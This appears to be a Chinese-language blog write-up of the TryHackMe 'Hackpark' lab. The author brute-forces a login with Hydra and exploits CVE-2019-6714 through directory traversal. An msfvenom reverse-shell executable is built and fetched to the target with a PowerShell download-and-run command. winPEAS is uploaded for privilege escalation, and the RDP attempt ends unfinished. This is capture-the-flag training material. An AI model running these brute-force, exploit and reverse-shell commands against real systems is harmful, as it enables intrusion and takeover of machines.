[Thm红队]Hackpark之MSF渗透入侵Windows主机和脚本提权(非常上强度,失败了)

前言

房间地址：https://tryhackme.com/room/hackpark

使用 Hydra 暴力破解网站登录，识别并使用公共漏洞，然后升级您在此 Windows 计算机上的权限！

建站不一定需要linux(实际上市场上大部分都是linux,本次要打的靶场是用win建站,我们通过的网站漏洞打进Windows主机

看到是人入侵Windows 使用到了MSF，看经典好像是当年的永恒之蓝漏洞

实战

靶机地址：10.10.201.235

Hackpark的引入

小丑回魂里的,我虽然没看过这个电影,但是刷过片段,还行,这里只是一个小丑,其实我也是小丑

有个联系,预测可能有XSS注入,

这里有个登录,那就是爆破了

我们看下 第一题：

九头蛇爆破账号密码

让后看第二题

Hydra 确实有很多功能，并且有许多可用的“模块”（模块的一个示例是我们上面使用的http-post-form  ）。

然而，这个工具不仅适用于暴力破解 HTTP 表单，还适用于其他协议，如 FTP、SSH、SMTP、SMB 等。 

下面是一个迷你备忘单：

命令	描述
Hydra -P <单词列表> -v <ip> <协议>	对您选择的协议进行暴力破解
Hydra -v -V -u -L <用户名列表> -P <密码列表> -t 1 -u <ip> <协议>	您可以使用 Hydra 来暴力破解用户名和密码。它将循环遍历列表中的每个组合。（-vV = 详细模式，显示登录尝试）
Hydra -t 1 -V -f -l <​​用户名> -P <单词列表> rdp://<ip>	使用密码列表攻击 Windows 远程桌面。
Hydra -l <​​用户名> -P .<密码列表> $ip -V http-form-post ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=登录&testcookie=1:S =位置’	为 Hydra 提出更具体的暴力请求。

我还是用burp吧 。

我前面发了很多爆破账号密码的，这里就不演示了

密码：1qaz2wsx

thm连接老是断 ,等订阅结束就打htb

CVE-2019-6714利用反弹shell

第三关需要用到CVE漏洞脚本+目录遍历+RCE命令执行+文件上传漏洞

看第三关

可以看到版本

我们搜一下漏洞库

果然是有XSS漏洞 不过是在3.3.8 3.3.6应该也有

CVE-2019-6714 刚开始房间也有提示

当然我们也可以找漏洞库查看

第三个答案让我们使用公共漏洞，获得对服务器的初始访问权限。

searchsploit -m aspx/webapps/46353.cs

咱们给他下到桌面上使用

nano 46353.cs

好让我们按他说的做

上传完看给的脚本下一步让我们怎么做

这里让我们目录遍历执行RCE漏洞

所以目录遍历+Rce命令执行直接弹shell了

http://10.10.201.235/?theme=../../App_Data/files

这里是win建的站 所以命令跟Linux不太一样

本篇重点MSF生成木马+winpeas提权脚本利用

来到第四关

MSF生成shell木马：

msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=10.8.249.244 LPORT=1238 -f exe -o reverse.exe

之后开启http服务

python3 -m http.server  

加载msf

msfconsole

use exploit/multi/handler #进入攻击模块

之后设置我们生成的ip和端口

show options
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST tun0
set LHOST tun0
set LPORT 1238

让后运行木马

run

因为Windows需要在powershell里运行 众所周知cmd和powershell不一样 所以我们需要转一下目录在靶机里运行我们msf生成的shell

移动到temp

cd Windows
cd Temp

让靶机下载我们的shell

powershell Invoke-WebRequest -Uri http://10.8.249.244:8000/reverse.exe -Outfile reverse.exe

让后运行shell

.\reverse.exe

OK 看图,现在已经得到目标机器的权限了

查看系统版本信息：

sysinfo

好的我们继续

使用国外大佬Winpeas脚本提权

好的 下面介绍一下winpeas,前期我们了解到linpeas是跑linux提权的,顾名思义,那么winpeas就是跑win机器提权的

winpeas下载：

https://github.com/carlospolop/PEASS-ng/blob/master/winPEAS/winPEASbat/winPEAS.bat

传上去

powershell Invoke-WebRequest -Uri http://10.8.249.244:8000/winPEAS.bat -Outfile winPEAS.bat

好的那我们运行他吧

先shell在运行 大宝贝出现了

结果非常长 而且需要耗点时间

让我们先做题吧

给我们提示了

那我们进去一下

SystemScheduler应该是系统文件了

第一个事件应该是错误的地方

我们查看一下txt

石锤了 应该就是message.exe这个程序

我们在看一下winPEAS.bat

看我们发现了什么？(狂喜

远程admin 说明他很有可能开了3389端口 我们去扫一下看看

nmap -T4 -p 3000-4000 -Pn 10.10.201.235

果然开放了3389,我们去连接看一下

nnd,失败卡住了

3389rdp admin账号密码出来了,我们尝试去连接

失败了

Linux rdp连接也失败了 被阻断了

卡在这了。。我c 没做完

时间也到期了,重来一遍要耗点时间..

Windows渗透比linux难,目前Windows渗透我还不怎么会,这次没做完,下次更新继续做,这个房间确实有意思,但难度让我吃不消了

------本文已结束，感谢您的阅读------